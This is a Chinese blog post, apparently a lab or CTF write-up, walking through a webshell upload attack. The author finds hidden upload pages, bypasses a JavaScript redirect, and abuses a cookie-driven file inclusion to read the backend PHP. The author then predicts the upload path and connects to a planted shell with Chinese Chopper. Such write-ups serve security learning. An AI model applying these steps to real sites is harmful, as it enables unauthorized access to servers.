•   站长QQ3308757747
  •   官方Q群:1057658362

webshell文件上传分析溯源

摘要: dirbuster扫描目录发现几个有用的东东/admin/upload.php/admin/upload1.php/admin/upload2.php访问的时候最后都会跳转到/admin/upload...

dirbuster扫描目录发现几个有用的东东


/admin/upload.php
/admin/upload1.php
/admin/upload2.php

访问的时候最后都会跳转到/admin/upload2.php 前端没任何东西

但是/admin/upload1.php会有一个弹窗,查看一下前端代码

view-source:http://219.153.49.228:43799/admin/upload1.php

会发现

<script language=javascript>alert('您无权限访问!');window.open('upload2.php','_top');</script>    
<form enctype="multipart/form-data" action="upload_file.php" method="post">     
Send this file: <input name="filename" type="file">     
<input type="hidden" name="verify" value="f8fc6604c7150e1d"/>    
<input type="submit" value="Send File">     
</form>

第一行调用了javascript,我们在浏览器里把JavaScript禁用就能正常访问了

而且这里有个亮眼的点

先抓一下访问包,再抓一下上传包

可以看到,upload_file.php是用来处理数据的,upload1.php我猜测是来生成cookie的它读取服务器上的一个txt文件,这里很有可能存在文件包含漏洞

尝试一下把uploadmd5的值改为upload_file.php

读取一下后端代码2020-05-15_163230.png 

对这段代码进行分析

<?php 
$path="uploadfile/";//上传路径  
$verify=$_POST["verify"];//接收verify参数
$time=date("Ymd");//取当前日期,今天是20200515
if($_FILES["filename"]["name"])  
{  
$file1=$_FILES["filename"]["name"];//取上传文件名
$file2 = $path.$time.'_'.$verify.'_'.$file1;  //拼接字符串,分析一下大概就是/uploadfile/20200515_f8fc6604c7150e1d_shell.php
$flag=1;  
}  
if($flag) $result=move_uploaded_file($_FILES["filename"]["tmp_name"],$file2);  
if($result) echo "上传成功!";  

?>

菜刀链接即可

http://219.153.49.228:43799/admin/uploadfile/20200515_f8fc6604c7150e1d_shell.php?a=1Q2W3E

2020-05-15_164415.png

本文链接:http://www.my-index.cn/?id=44

版权声明:转载请注明转自“my-index.cn”

分享到:

发表评论

评论列表

还没有评论,快来说点什么吧~

歌曲 - 歌手
0:00